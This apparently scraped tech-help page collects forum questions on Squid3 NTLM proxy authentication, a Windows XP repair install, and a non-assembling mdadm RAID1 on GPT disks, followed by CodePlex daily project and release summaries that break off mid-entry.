    some users here are spending to much time exploring the WWW. So big boss whats to get this under control. We use a squid3 just for some security reason and chace benefits. and now i'm trying to set up a new proxy on a different server (Debian 6) Permissions are defined in AC and the squid3 should get the auth thru samba/winbind by using the ntlm protocol. but i'll get all the time Access, denited. it only works by using LDAP but thats not the way i need it. here some log and confs squid access.log 1326878095.784 1 192.168.15.27 TCP_DENIED/407 4049 GET http://at.msn.com/? -NONE/- text/html 1326878095.791 1 192.168.15.27 TCP_DENIED/407 4294 GET http://at.msn.com/? - NONE/- text/html 1326878095.803 9 192.168.15.27 TCP_DENIED/403 4028 GET http://at.msn.com/? kavan NONE/- text/html 1326878095.848 0 192.168.15.27 TCP_DENIED/403 3881 GET http://www.squid-cache.org/Artwork/SN.png kavan NONE/- text/html 1326878100.279 0 192.168.15.27 TCP_DENIED/403 3735 GET http://www.google.at/ kavan NONE/- text/html 1326878100.296 0 192.168.15.27 TCP_DENIED/403 3870 GET http://www.squid-cache.org/Artwork/SN.png kavan NONE/- text/html 1326878155.700 0 192.168.15.27 TCP_DENIED/407 4072 GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml - NONE/- text/html 1326878155.705 2 192.168.15.27 TCP_DENIED/407 4317 GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml - NONE/- text/html 1326878155.709 3 192.168.15.27 TCP_DENIED/403 4026 GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml kavan NONE/- text/html squid chace 2012/01/18 10:12:49| Creating Swap Directories 2012/01/18 10:12:49| Starting Squid Cache version 3.1.6 for x86_64-pc-linux-gnu... 2012/01/18 10:12:49| Process ID 17236 2012/01/18 10:12:49| With 65535 file descriptors available 2012/01/18 10:12:49| Initializing IP Cache... 2012/01/18 10:12:49| DNS Socket created at [::], FD 7 2012/01/18 10:12:49| DNS Socket created at 0.0.0.0, FD 8 2012/01/18 10:12:49| Adding nameserver 192.168.15.2 from /etc/resolv.conf 2012/01/18 10:12:49| Adding nameserver 192.168.15.19 from /etc/resolv.conf 2012/01/18 10:12:49| Adding nameserver 192.168.15.1 from /etc/resolv.conf 2012/01/18 10:12:49| Adding domain schoenbrunn.local from /etc/resolv.conf 2012/01/18 10:12:49| helperOpenServers: Starting 5/5 'squid_ldap_auth' processes 2012/01/18 10:12:49| helperOpenServers: Starting 10/10 'ntlm_auth' processes 2012/01/18 10:12:49| helperOpenServers: Starting 10/10 'squid_kerb_auth' processes 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| helperOpenServers: Starting 5/5 'squid_ldap_group' processes 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| squid_kerb_auth: INFO: Starting version 1.0.5 2012/01/18 10:12:49| Unlinkd pipe opened on FD 73 2012/01/18 10:12:49| Local cache digest enabled; rebuild/rewrite every 3600/3600 sec 2012/01/18 10:12:49| Store logging disabled 2012/01/18 10:12:49| Swap maxSize 0 + 262144 KB, estimated 20164 objects 2012/01/18 10:12:49| Target number of buckets: 1008 2012/01/18 10:12:49| Using 8192 Store buckets 2012/01/18 10:12:49| Max Mem size: 262144 KB 2012/01/18 10:12:49| Max Swap size: 0 KB 2012/01/18 10:12:49| Using Least Load store dir selection 2012/01/18 10:12:49| Set Current Directory to /var/spool/squid3 2012/01/18 10:12:49| Loaded Icons. 2012/01/18 10:12:49| Accepting HTTP connections at [::]:3128, FD 74. 2012/01/18 10:12:49| HTCP Disabled. 2012/01/18 10:12:49| Squid modules loaded: 0 2012/01/18 10:12:49| Adaptation support is off. 2012/01/18 10:12:49| Ready to serve requests. 2012/01/18 10:12:50| storeLateRelease: released 0 objects smb.conf # Domain Authntication Settings workgroup = <WORKGROUP> security = ads password server = <DOMAINNAME>.LOCAL realm = <DOMAINNAME>.LOCAL ldap ssl = no # logging log level = 5 max log size = 50 # logs split per machine log file = /var/log/samba/%m.log # max 50KB per log file, then rotate ; max log size = 50 # User settings username map = /etc/samba/smbusers idmap uid = 10000-20000000 idmap gid = 10000-20000000 idmap backend = ad ; template primary group = <ad group> template shell = /sbin/nologin # Winbind Settings winbind separator = + winbind enum users = Yes winbind enum groups = Yes winbind netsted groups = Yes winbind nested groups = Yes winbind cache time = 10 winbind use default domain = Yes #Other Globals unix charset = LOCALE server string = <SERVERNAME> load printers = no printing = cups cups options = raw ; printcap name = /etc/printcap #obtain list of printers automatically on SystemV ; printcap name = lpstat ; printing = cups squid.conf auth_param ntlm program /usr/bin/ntlm_auth --require-membership-of=<DOMAINNAME>\\INTERNETZ --helper-protocol=squid-2.5-ntlmssp auth_param ntlm children 10 auth_param basic program /usr/lib/squid3/squid_ldap_auth -R -b "dc=<dcname>,dc=local" -D "cn=administrator,cn=Users,dc=<domainname>,dc=local" -w "******" -f sAMAccountName=%s -h 192.168.15.19:3268 auth_param basic realm "Proxy Authentifizierung. Bitte geben Sie Ihren Benutzername und Ihr Passwort ein!" #means insert you PW in an other language - # external_acl_type InetGroup %LOGIN /usr/lib/squid3/squid_ldap_group -R -b "dc=<domainname>,dc=local" -D "cn=administrator,cn=Users,dc=<domainname>,dc=local" -w "******" -f "(&(objectclass=person)(sAMAccountName=%v) (memberof=cn=%a,cn=internetz,dc=<domainname>,dc=local))" -h 192.168.15.19:3268 auth_param negotiate program /usr/lib/squid3/squid_kerb_auth -d auth_param negotiate children 10 auth_param negotiate keep_alive on acl localnet proxy_auth REQUIRED acl InetAccess external InetGroup Internetz http_access allow InetAccess http_access deny all acl auth proxy_auth REQUIRED http_access allow auth and a very suspicious is that by adding the proxy server to the Domain i see 2 new entries in the PC one with the original computer-name leopoldine and one with leopoldine CNF:f8efa4c4-ff0e-4217-939d-f1523b43464d ?!? I tried a lot, really... but i stuck on this problem... i actually i even reinstalled all dependent programs and reconfigured them from default. Group exists and has me in it. Firefox running on the old proxy and i use IE for testing the new one. But i'll get all the time Access-Denited and to be honest i'm quite a beginner, so please don't be to prude. I'll interested in improving, i'll get the information we need to fix this but i started working 2 month ago and got only 1 1/2 year's training and not a single sec. in linux ;)

    Read the article

  • Windows installation repair option not showing up

    - by Carl
    I'm trying to repair an existing Windows XP installation. Following the instructions from http://www.microsoft.com/windowsxp/using/helpandsupport/learnmore/tips/doug92.mspx this should work: When the Press any key to boot from CD message is displayed on your screen, press a key to start your computer from the Windows XP CD. Press ENTER when you see the message To setup Windows XP now, and then press ENTER displayed on the Welcome to Setup screen. Do not choose the option to press R to use the Recovery Console. In the Windows XP Licensing Agreement, press F8 to agree to the license agreement. Make sure that your current installation of Windows XP is selected in the box, and then press R to repair Windows XP. Follow the instructions on the screen to complete Setup. On step 5 pressing R does nothing and there is nothing on the screen saying it would. When I just select to install I get a message that a previous installation is there and proceeding will destroy it and installed applications, I can optionally select a directory other than c:\windows, and I can optionally format before continuing. I had tried to go from SP2-SP3. It failed, and then I couldn't get to Safe Mode. I put the SP1 disk back in to do a repair, and I don't see that option. (I don't have an SP2 boot/install disk, I just have the non-boot upgrade package.) UPDATE: Upon loading the Recovery Console, I get a message saying The system registry does not appear to have an active ControlSet key. The system registry may be damaged. You can try restarting it with the Last Known Good configuration or you can try repairing the installation of Windows using the setup program's repair and recovery options. I then did bootcfg /scan - "successful" ... Total installs: 1 ... [1] c:\windows - with the c:\windows command prompt below it. bootcfg /list gives [1] Windows XP Pro; OS Load Options /noexecute=optin /fastdetect; OS Location: c:\windows I followed the instructions at http://michaelstevenstech.com/XPrepairinstall.htm - "Warning 2" link copy E:\i386\ntldr C:\ copy E:\i386\ntdetect.com C:\ attrib -h -r -s C:\boot.ini del C:\boot.ini BootCfg /Rebuild I added /fastdetect when it asked for options. I re-ran Windows setup - no change - no repair option. UPDATE: I followed the procedure at http://support.microsoft.com/default.aspx?scid=kb;en-us;307545 I rebooted. I now get a quick message on bootup to select the boot - 1: [blank] ; Windows XP Professional ; Windows Recover Console. The "1: " is new. The rest is the way it was when all was okay. Selecting 1: and the next one gives the same result - I get to a login icon, and then it asks for a password, with the blinking cursor, but I can't type anything. I reboot with the Windows CD. Now I see a repair option for installation "1: " I selected R on that, and it did "Setup is copying files..." and rebooted when it was done. Then it booted, and I got a window saying "Setup will complete in approximately 39 minutes." That's where I am now. I wasn't expecting this last part - I did a repair several months ago and I don't recall that. UPDATE: Booted up. Asked if I wanted to register Windows online. All my icons are there, and the old desktop documents. Good. All the applications I tried from the Start Menu work (tested a few), except Corel Photopaint - I get registry entry not found errors. Windows ran for a while, then froze. The mouse and keyboard don't work. Pressing the power button got Windows to shut down. I probably need to put SP2 on it, and then all the updates for my laptop for XP Pro SP2 (drivers), there's a bunch. The mouse and keyboard quit working again. That wasn't a problem when I first set up this laptop. I've ran 4 times now. Two mouse/keyboards hangs by pressing Ctrl-C (to copy text from a notepad document), and two by selecting Start-Run (wasn't able to type anything in the box).

    Read the article

  • Build and migrated to software raid (mdadm) on GPT disk, now can't assemble array

    - by John H
    mdadm, gpt issues, unrecognized partitions. Simplified question: How do I get mdadm to recognize GPT partitions? I have been attempting to convert/copy my Ubuntu 11.10 OS from a single drive to software raid 1. I have done similar in the past, but in this case, I was adding in a drive that has been configured for GPT and I tried to work with that without fully looking into the implications. Currently, I have a non-booting mdadm RAID 1 array of /dev/md127 (the OS assigned that and it keeps picking up). I am booting off of live USB keys, currently System Rescue CD from sysresccd. While gdisk and parted can see all the partitions, most of the OS utilities do not, including mdadm. My main goal is just to make the raid array accessible so I can get pull the data and start fresh (without using GPT). /dev/md127 /dev/sda /dev/sda1 <- GPT type partition /dev/sda1 <- exists within the GPT part, member of md127 /dev/sda2 <- exists within the GPT part, empty /dev/sdb /dev/sdb1 <- GPT type partition /dev/sdb1 <- exists within the GPT part, member of md127 History: POINT A: The original OS was install on sda (actually /dev/sda6). I used a the Ubuntu live usb to add sdb. I got warning from fdisk about GPT so I used gdisk to create a raid partition (sdb1) and mdadm to create a raid1 mirror with a missing drive. I had many issues getting this working (including being unable to get grub to install) but I eventually got it to boot using grub on sda and /dev/md127 off of sdb. So at point A, I had copied my OS from sda6 to md127 on sdb. I then booted into a rescue mode and attempted to get a bootloader onto sdb, which failed. I then discovered my mistake: I had installed the raid onto sdb instead of sdb1, essentially overwriting the sdb1 partition. POINT B: I now had two copies of my data- one on md127/sdb, and one on sda. I destroyed data on sda and created a new GPT table on sda. I then created sda1 for the raid array, and sda2 for a scratch partition. I added sda1 into the raid array and let it rebuild. md127 now covered /dev/sdb and /dev/sda1 as fully active and synced. POINT C: I rebooted onto linux rescue again and was still able to access the raid array. I then removed /dev/sdb from the array and created /dev/sdb1 for the raid. I added sdb1 to the array and let it sync. I was able to mount and access /dev/md127 without issues. Once it completed, both /dev/sda1 and /dev/sdb1 were GPT partitions and actively syncing. POINT D (current): I rebooted again to test if the array would boot and grub failed to load. I booted off of my live thumb drive and found that I can no longer assemble the raid array. mdadm doesn't see the required partitions. -- root@freshdesk /root % uname -a Linux freshdesk 3.0.24-std251-amd64 #2 SMP Sat Mar 17 12:08:55 UTC 2012 x86_64 AMD Athlon(tm) II X4 645 Processor AuthenticAMD GNU/Linux === /proc/partitions and parted look good: root@freshdesk /root % cat /proc/partitions major minor #blocks name 7 0 301788 loop0 8 0 976762584 sda 8 1 732579840 sda1 8 2 244181703 sda2 8 16 732574584 sdb 8 17 732573543 sdb1 8 32 7876607 sdc 8 33 7873349 sdc1 (parted) print all Model: ATA ST31000528AS (scsi) Disk /dev/sda: 1000GB Sector size (logical/physical): 512B/512B Partition Table: gpt Number Start End Size File system Name Flags 1 1049kB 750GB 750GB ext4 2 750GB 1000GB 250GB Linux/Windows data Model: ATA SAMSUNG HD753LJ (scsi) Disk /dev/sdb: 750GB Sector size (logical/physical): 512B/512B Partition Table: gpt Number Start End Size File system Name Flags 1 1049kB 750GB 750GB ext4 Linux RAID raid Model: SanDisk SanDisk Cruzer (scsi) Disk /dev/sdc: 8066MB Sector size (logical/physical): 512B/512B Partition Table: msdos Number Start End Size Type File system Flags 1 31.7kB 8062MB 8062MB primary fat32 boot, lba === # no sda2, and I double the sdb1 is the one shown in parted root@freshdesk /root % blkid /dev/loop0: TYPE="squashfs" /dev/sda1: UUID="75dd6c2d-f0a8-4302-9da4-792cc7d72355" TYPE="ext4" /dev/sdc1: LABEL="PENDRIVE" UUID="1102-3720" TYPE="vfat" /dev/sdb1: UUID="2dd89f15-65bb-ff88-e368-bf24bd0fce41" TYPE="linux_raid_member" root@freshdesk /root % mdadm -E /dev/sda1 mdadm: No md superblock detected on /dev/sda1. # this is probably a result of me attempting to force the array up, putting superblocks on the GPT partition root@freshdesk /root % mdadm -E /dev/sdb1 /dev/sdb1: Magic : a92b4efc Version : 0.90.00 UUID : 2dd89f15:65bbff88:e368bf24:bd0fce41 Creation Time : Fri Mar 30 19:25:30 2012 Raid Level : raid1 Used Dev Size : 732568320 (698.63 GiB 750.15 GB) Array Size : 732568320 (698.63 GiB 750.15 GB) Raid Devices : 2 Total Devices : 2 Preferred Minor : 127 Update Time : Sat Mar 31 12:39:38 2012 State : clean Active Devices : 1 Working Devices : 2 Failed Devices : 1 Spare Devices : 1 Checksum : a7d038b3 - correct Events : 20195 Number Major Minor RaidDevice State this 2 8 17 2 spare /dev/sdb1 0 0 8 1 0 active sync /dev/sda1 1 1 0 0 1 faulty removed 2 2 8 17 2 spare /dev/sdb1 === root@freshdesk /root % mdadm -A /dev/md127 /dev/sda1 /dev/sdb1 mdadm: no recogniseable superblock on /dev/sda1 mdadm: /dev/sda1 has no superblock - assembly aborted root@freshdesk /root % mdadm -A /dev/md127 /dev/sdb1 mdadm: cannot open device /dev/sdb1: Device or resource busy mdadm: /dev/sdb1 has no superblock - assembly aborted

    Read the article

  • CodePlex Daily Summary for Monday, March 01, 2010

    CodePlex Daily Summary for Monday, March 01, 2010New ProjectsActiveWorlds World Server Admin PowerShell SnapIn: The purpose of this PowerShell SnapIn is to provide a set of tools to administer the world server from PowerShell. It leverages the ActiveWorlds S...AWS SimpleDB Browser: A basic GUI browser tool for inspection and querying of a SimpleDB.Desktop Dimmer: A simple application for dimming the desktop around windows, videos, or other media.Disk Defuzzer: Compare chaos of files and folders with customizable SQL queries. This little application scans files in any two folders, generates data in an A...Dynamic Configuration: Dynamic configuration is a (very) small library to provide an API compatible replacement for the System.Configuration.ConfigurationManager class so...Expression Encoder 3 Visual Basic Samples: Visual Basic Sample code that calls the Expression Encoder 3 object model.Extended Character Keyboard: An lightweight onscreen keyboard that allows you to enter special characters like "á" and "û". Also supports adding of 7 custom buttons.FileHasher: This project provides a simple tool for generating and verifying file hashes. I created this to help the QA team I work with. The project is all C#...Fluent Assertions: Fluent interface for writing more natural specifying assertions with more clarity than the traditional assertion syntax such as offered by MSTest, ...Foursquare BlogEngine Widget: A Basic Widget for BlogEngine which displays the last foursquare Check-insGraffiti CMS Events Plugin: Plugin for Graffiti CMS that allows creating Event posts and rendering an Event CalendarHeadCounter: HeadCounter is a raid attendance and loot tracking application for World of Warcraft.HRM Core (QL Nhan Su): This is software about Human Resource Management in Viet Nam ------------ Đây là phần mềm Quản lý nhân sự tiền lương ở Việt Nam (Nghiệp vụ ở Việt Nam)IronPython Silverlight Sharpdevelop Template: This IronPython Silverlight SharpDevelop Template makes it easier for you to make Silverlight applications in IronPython with Sharpdevelop.kingbox: my test code for study vs 2005link_attraente: Projeto Conclusão de CursoORMSharp.Net: ORMSharp.Net https://code.google.com/p/ormsharp/ http://www.sqlite.org/ http://sqlite.phxsoftware.com/ http://sourceforge.net/projects/sqlite-dotnet2/Orz framework: Orz framework is more like a helpful library, if you are develop with DotNet framework 3.0, it will be very useful to you. Orz framework encapsul...OTManager: OTManagerSharePoint URL Ping Tool: The Url Ping Tool is a farm feature in SharePoint that provide additional performance and tracing information that can be used to troubleshoot issu...SunShine: SunShine ProjectToolSuite.ValidationExpression: assembly with regular expression for the RegularExpressionValidator controlTwitual Studio: A Visual Studio 2010 based Twitter client. Now you have one less reason for pressing Alt+Tab. Plus you still look like you're working!Velocity Hosting Tool: A program designed to aid a HT Velocity host in hosting and recording tournaments.Watermarker: Adds watermark on pictures to prevent copy. Icon taken from PICOL. Can work with packs of images.Zack's Fiasco - ASP.NET Script Includer: Script includer to * include scripts (JS or CSS) once and only once. * include the correct format by differentiating between release and build. Th...New ReleasesAll-In-One Code Framework: All-In-One Code Framework 2010-02-28: Improved and Newly Added Examples:For an up-to-date list, please refer to All-In-One Code Framework Sample Catalog. Samples for ASP.NET Name ...All-In-One Code Framework (简体中文): All-In-One Code Framework 2010-02-28: Improved and Newly Added Examples:For an up-to-date list, please refer to All-In-One Code Framework Sample Catalog. Latest Download Link: http://c...AWS SimpleDB Browser: SimpleDbBrowser.zip Initial Release: The initial release of the SimpleDbBrowser. Unzip the file in the archive and place them all in a folder, then run the .exe. No installer is used...BattLineSvc: V1: First release of BattLineSvcCC.Votd Screen Saver: CC.Votd 1.0.10.301: More bug fixes and minor enhancements. Note: Only download the (Screen Saver) version if you plan to manually install. For most users the (Install...Dynamic Configuration: DynamicConfiguration Release 1: Dynamic Configuration DLL release.eIDPT - Cartão de Cidadão .NET Wrapper: EIDPT VB6 Demo Program: Cartão de Cidadão Middleware Application installation (v1.21 or 1.22) is required for proper use of the eID Lib.eIDPT - Cartão de Cidadão .NET Wrapper: eIDPT VB6 Demo Program Source: Cartão de Cidadão Middleware Application installation (v1.21 or 1.22) is required for proper use of the eID Lib.ESPEHA: Espeha 10: 1. Help available on F1 and via context menu '?' 2. Width of categiries view is preserved througb app starts 3. Drag'nd'drop for tasks view allows ...Extended Character Keyboard: OnscreenSCK Beta V1.0: OnscreenSCK Beta Version 1.0Extended Character Keyboard: OnscreenSCK Beta V1.0 Source: OnscreenSCK Beta Version 1.0 Source CodeFileHasher: Console Version v 0.5: This release provides a very basic and minimal command-line utility for generating and validating file hashes. The supported command-line paramete...Furcadia Framework for Third Party Programs: 0.2.3 Epic Wrench: Warning: Untested on Linux.FurcadiaLib\Net\NetProxy.cs: Fixed a bug I made before update. FurcadiaFramework_Example\Demo\IDemo.cs: Ignore me. F...Graffiti CMS Events Plugin: Version 1.0: Initial Release of Events PluginHeadCounter: HeadCounter 1.2.3 'Razorgore': Added "Raider Post" feature for posting details of a particular raider. Added Default Period option to allow selection of Short, Long or Lifetime...Home Access Plus+: v3.0.0.0: Version 3.0.0.0 Release Change Log: Reconfiguration of the web.config Ability to add additional links to homepage via web.config Ability to add...Home Access Plus+: v3.0.1.0: Version 3.0.1.0 Release Change Log: Fixed problem with moving File Changes: ~/bin/chs extranet.dll ~/bin/chs extranet.pdbHome Access Plus+: v3.0.2.0: Version 3.0.2.0 Release Change Log: Fixed problem with stylesheet File Changes: ~/chs.masterHRM Core (QL Nhan Su): HRMCore_src: Source of HRMCoreIRC4N00bz: IRC4N00bz v1.0.0.2: There wasn't much updated this weekend. I updated 2 'raw' events. One is all raw messages and the other is events that arn't caught in the dll. ...IronPython Silverlight Sharpdevelop Template: Version 1 Template: Just unzip it into the Sharpdevelop python templates folder For example: C:\Program Files\SharpDevelop\3.0\AddIns\AddIns\BackendBindings\PythonBi...MDownloader: MDownloader-0.15.4.56156: Fixed handling exceptions; previous handling could lead to freezing items state; Fixed validating uploading.com links;OTManager: Activity Log: 2010.02.28 >> Thread Reopened 2010.02.28 >> Re-organized WBD Features/WMBD Features 2010.02.28 >> Project status is active againPicasa Downloader: PicasaDownloader (41175): NOTE: The previous release was accidently the same as the one before that (forgot to rebuild the installer). Changelog: Fixed workitem 10296 (Sav...PicNet Html Table Filter: Version 2.0: Testing w/ JQuery 1.3.2Program Scheduler: Program Scheduler 1.1.4: Release Note: *Bug fix : If the log window is docked and user moves the log window , main window will move too. *Added menu to log window to clear...QueryToGrid Module for DotNetNuke®: QueryToGrid Module version 01.00.00: This is the initial release of this module. Remember... This is just a proof of concept to add AJAX functionality to your DotNetNuke modules.Rainweaver Framework: February 2010 Release: Code drop including an Alpha release of the Entity System. See more information in the Documentation page.RapidWebDev - .NET Enterprise Software Development Infrastructure: ProductManagement Quick Sample 0.1: This is a sample product management application to demonstrate how to develop enterprise software in RapidWebDev. The glossary of the system are ro...Team Foundation Server Revision Labeller for CruiseControl.NET: TFS Labeller for CruiseControl.NET - TFS 2008: ReleaseFirst release of the Team Foundation Server Labeller for CruiseControl.NET. This specific version is bound to TFS 2008 DLLs.ToolSuite.ValidationExpression: 01.00.01.000: first release of the time validation class; the assembly file is ready to use, the documentation ist not complete;VCC: Latest build, v2.1.30228.0: Automatic drop of latest buildWatchersNET CKEditor™ Provider for DotNetNuke: CKEditor Provider 1.7.00: Whats New FileBrowser: Non Admin Users will only see a User Sub folder (..\Portals\0\userfiles\UserName) CKFinder: Non Admin Users will only see ...Watermarker: Watermarker: first public version. can build watermark only in left top corner on one image at once.While You Were Away - WPF Screensaver: Initial Release: This is the code released when the article went live.Most Popular ProjectsMetaSharpRawrWBFS ManagerAJAX Control ToolkitMicrosoft SQL Server Product Samples: DatabaseSilverlight ToolkitWindows Presentation Foundation (WPF)Microsoft SQL Server Community & SamplesASP.NETDotNetNuke® Community EditionMost Active ProjectsRawrBlogEngine.NETMapWindow GISCommon Context Adapterspatterns & practices – Enterprise LibrarySharpMap - Geospatial Application Framework for the CLRSLARToolkit - Silverlight Augmented Reality ToolkitDiffPlex - a .NET Diff GeneratorRapid Entity Framework. (ORM). CTP 2jQuery Library for SharePoint Web Services

    Read the article

  • CodePlex Daily Summary for Tuesday, March 09, 2010

    CodePlex Daily Summary for Tuesday, March 09, 2010New Projects.NET Excel Wrapper - Read, Write, Edit & Automate Excel Files in .NET with ease: .NET Excel Wrapper encapsulates the complexity of working with multiple Excel objects giving you one central point to do all your processing. It h...Advancement Voyage: Advancement Voyage is a high quality RPG experience that provides all the advancement and voyaging that a player could hope for.ASP.Net Routing configuration: ASP.NET routing configuration enables you to configure the routes in the web.config bbinjest: bbinjestBuildUp: BuildUp is a build number increment tool for C# .net projects. It is run as a post build step in Visual Studio.Controlled Vocabulary: This project is devoted to creating tools to assist with Controlling Vocabulary in communication. The initial delivery is an Outlook 2010 Add-in w...CycleList: A replacement for the WPF ListBox Control. Displays only a single item and allows the user to change the selected item by clicking on it once. Very...Forensic Suite: A suite of security softwareFREE DNN Chat Module for 123 Flash Chat -- Embed FREE Chat Room!: 123 Flash Chat is a live chat solution and its DotNetNuke Chat Module helps to embed a live chat room into website with DotNetNuke(DNN) integrated ...HouseFly experimental controls: Experimental controls for use in HouseFly.ICatalogAll: junkMidiStylus: MidiStylus allows you to control MIDI-enabled hardware or software using your pressure-sensitive pen tablet. The program maps the X position, Y po...myTunes: Search for your favorite artistsNColony - Pluggable Socialism?: NColony will maximize the use of MEF to create flexible application architectures through a suite of plug-in solutions. If MEF is an outlet for plu...Network Monitor Decryption Expert: NmDecrypt is a Network Monitor Expert which when given a trace with encrypted frames, a security certificate, and a passkey will create a new trace...occulo: occulo is a free steganography program, meant to embed files within images with optional encrytion. Open Ant: A implementation of a Open Source Ant which is created to show what is possible in the serious game AntMe! The First implementation of that ProjectProgramming Patterns by example: Design patterns provide solutions to common software design problems. This project will contain samples, written in c# and ruby, of each design pat...project4k: Developing bulk mail system storing email informationQuail - Selenium Remote Control Made Easy: Quail makes it easy for Quality Assurance departments write automated tests against web applications. Both HTML and Silverlight applications can b...RedBulb for XNA Framework: RedBulb is a collection of utility functions and classes that make writing games with XNA a lot easier. Key features: Console,GUI (Labels, Buttons,...RegExpress: RegExpress is a WPF application that combines interactive demos of regular expressions with slide content. This was designed for a user group prese...RemoveFolder: Small utility program to remove empty foldersScrumTFS: ScrumTFSSharePoint - Open internal link in new window list definition: A simple SharePoint list definition to render SharePoint internal links with the option to open them in a new window.SqlSiteMap4MVC: SqlSiteMapProvider for ASP.Net MVC.T Sina .NET Client: t.sina.com.cn api 新浪微博APITest-Lint-Extensions: Test Lint is a free Typemock VS 2010 Extension that finds common problems in your unit tests as you type them. this project will host extensions ...ThinkGearNET: ThinkGearNET is a library for easy usage of the Neurosky Mindset headset from .NET .Wiki to Maml: This project enables you to write wiki syntax and have it converted into MAML syntax for Sandcastle documentation projects.WPF Undo/Redo Framework: This project attempts to solve the age-old programmer problem of supporting unlimited undo/redo in an application, in an easily reusable manner. Th...WPFValidators: WPF Validators Validações de campos para WPFWSP Listener: The WSP listener is a windows service application which waits for new WSC and WSP files in a specific folder. If a new WSC and WSP file are added, ...New Releases.NET Excel Wrapper - Read, Write, Edit & Automate Excel Files in .NET with ease: First Release: This is the first release which includes the main library release..NET Excel Wrapper - Read, Write, Edit & Automate Excel Files in .NET with ease: Updated Version: New Features:SetRangeValue using multidimensional array Print current worksheet Print all worksheets Format ranges background, color, alig...ArkSwitch: ArkSwitch v1.1.2: This release removes all memory reporting information, and is focused on stability.BattLineSvc: V2.1: - Fixed a bug where on system start-up, it would pop up a notification box to let you know the service started. Annoying! And fixed! - Fixed the ...BuildUp: BuildUp 1.0 Alpha 1: Use at your own risk!Not yet feature complete. Basic build incrementing and attribute overriding works. Still working on cascading build incremen...Controlled Vocabulary: 1.0.0.1: Initial Alpha Release. System Requirements Outlook 2010 .Net Framework 3.5 Installation 1. Close Outlook (Use Task Manager to ensure no running i...CycleList: CycleList: The binaries contain the .NET 3.5 DLL ONLY. Please download source for usage examples.FluentNHibernate.Search: 0.3 Beta: 0.3 Beta take the following changes : Mappings : - Field Mapping without specifying "Name" - Id Mapping without specifiying "Field" - Builtin Anal...FREE DNN Chat Module for 123 Flash Chat -- Embed FREE Chat Room!: 123 Flash Chat DNN Chat Module: With FREE DotNetNuke Chat Module of 123 Flash Chat, webmaster will be assist to add a chat room into DotNetNuke instantly and help to attract more ...GameStore League Manager: League Manager 1.0 release 3: This release includes a full installer so that you can get your league running faster and generate interest quicker.iExporter - iTunes playlist exporting: iExporter gui v2.3.1.0 - console v1.2.1.0: Paypal donate! Solved a big bug for iExporter ( Gui & Console ) When a track isn't located under the main iTunes library, iExporter would crash! ...jQuery.cssLess: jQuery.cssLess 0.3: New - Removed the dependency from XRegExp - Added comment support (both CSS style and C style) - Optimised it for speed - Added speed test TOD...jQuery.cssLess: jQuery.cssLess 0.4: NEW - @import directive - preserving of comments in the resulting CSS - code refactoring - more class oriented approach TODO - implement operation...MapWindow GIS: MapWindow 6.0 msi (March 8): Rewrote the shapefile saving code in the indexed case so that it uses the shape indices rather than trying to create features. This should allow s...MidiStylus: MidiStylus 0.5.1: MidiStylus Beta 0.5.1 This release contains basic functionality for transmitting MIDI data based on X position, Y position, and pressure value rea...MiniTwitter: 1.09.1: MiniTwitter 1.09.1 更新内容 修正 URL に & が含まれている時に短縮 URL がおかしくなるバグを修正Mosaictor: first executable: .exe file of the app in its current state. Mind you that this will likely be highly unstable due to heaps of uncaught errors.MvcContrib a Codeplex Foundation project: T4MVC: T4MVC is a T4 template that generates strongly typed helpers for ASP.NET MVC. You can download it below, and check out the documention here.N2 CMS: 2.0 beta: Major Changes ASP.NET MVC 2 templates Refreshed management UI LINQ support Performance improvements Auto image resize Upgrade Make a comp...NotesForGallery: ASP.NET AJAX Photo Gallery Control: NotesForGallery 2.0: PresentationNotesForGallery is an open source control on top of the Microsoft ASP.NET AJAX framework for easy displaying image galleries in the as...occulo: occulo 0.1 binaries: Windows binaries. Tested on Windows XP SP2.occulo: occulo 0.1 source: Initial source release.Open NFe: DANFE 1.9.5: Ajuste de layout e correção dos campos de ISS.patterns & practices Web Client Developer Guidance: Web Application Guidance -- March 8th Drop: This iteration we focused on documentation and bug fixes.PoshConsole: PoshConsole 2.0 Beta: With this release, I am refocusing PoshConsole... It will be a PowerShell 2 host, without support for PowerShell 1.0 I have used some of the new P...Quick Performance Monitor: QPerfmon 1.1: Now you can specify different updating frequencies.RedBulb for XNA Framework: Cipher Puzzle (Sample) Creators Club Package: RedBulb Sample Game: Cipher Puzzle http://bayimg.com/image/galgfaacb.jpgRedBulb for XNA Framework: RedBulbStarter (Base Code): This is the code you need to start with. Quick Start Guide: Download the latest version of RedBulb: http://redbulb.codeplex.com/releases/view/415...RoTwee: RoTwee 7.0.0.0 (Alpha): Now this version is under improvement of code structure and may be buggy. However movement of rotation is quite good in this version thanks to clea...SCSI Interface for Multimedia and Block Devices: Release 9 - Improvements and Bug Fixes: Changes I have made in this version: Fixed INQUIRY command timeout problem Lowered ISOBurn's memory usage significantly by not explicitly setting...SharePoint - Open internal link in new window list definition: Open link in new window list definition: First release, with english and italian localization supportSharePoint Outlook Connector: Version 1.2.3.2: Few bug fixing and some ui enhancementsSysI: sysi, release build: Better than ever -- now allows for escalation to adminThe Silverlight Hyper Video Player [http://slhvp.com]: Beta 1: Beta (1.1) The code is ready for intensive testing. I will update the code at least every second day until we are ready to freeze for V1, which wi...Truecrafting: Truecrafting 0.52: fixed several trinkets that broke just before i released 0.51, sorry fixed water elemental not doing anything while summoned if not using glyph o...Truecrafting: Truecrafting 0.53: fixed mp5 calculations when gear contained mp5 and made the formulas more efficient no need to rebuild profiles with this release if placed in th...umbracoSamplePackageCreator (beta): Working Beta: For Visual Studio 2008 creating packages for Umbraco 4.0.3.VCC: Latest build, v2.1.30307.0: Automatic drop of latest buildVCC: Latest build, v2.1.30308.0: Automatic drop of latest buildVOB2MKV: 